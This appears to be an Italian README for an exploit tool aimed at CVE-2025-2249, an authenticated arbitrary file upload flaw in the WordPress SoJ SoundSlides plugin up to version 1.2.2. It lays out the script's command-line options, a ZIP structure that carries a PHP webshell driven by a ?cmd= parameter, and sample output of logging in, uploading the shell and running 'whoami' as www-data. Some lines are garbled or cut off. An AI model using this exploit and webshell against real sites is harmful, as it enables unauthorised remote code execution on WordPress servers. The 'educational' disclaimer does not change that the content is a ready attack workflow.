
Il plugin WordPress SoJ SoundSlides <= 1.2.2 è vulnerabile al Caricamento Arbitrario di File.
⚠️ DISCLAIMER: Questo exploit è solo per scopi educativi e di test autorizzati.
Il plugin SoJ SoundSlides consente agli utenti autenticati con ruoli Contributor o superiori di caricare file ZIP arbitrari. A causa della mancata validazione, gli attaccanti possono caricare webshell PHP che vengono estratte ed eseguite da una directory accessibile via web.
Un attaccante con credenziali WordPress valide può:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| Parametro | Descrizione |
|---|---|
-u | URL base di WordPress |
-un | Nome utente WordPress |
-p | Password WordPress |
readme.txt del pluginnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ per file .php inattesiCreato con ❤️ da [Nxploited | Khaled ALenazi]
Per educazione, consapevolezza e difesa.
La sicurezza è responsabilità di tutti. Testa sempre eticamente, segnala in modo responsabile e proteggi il web.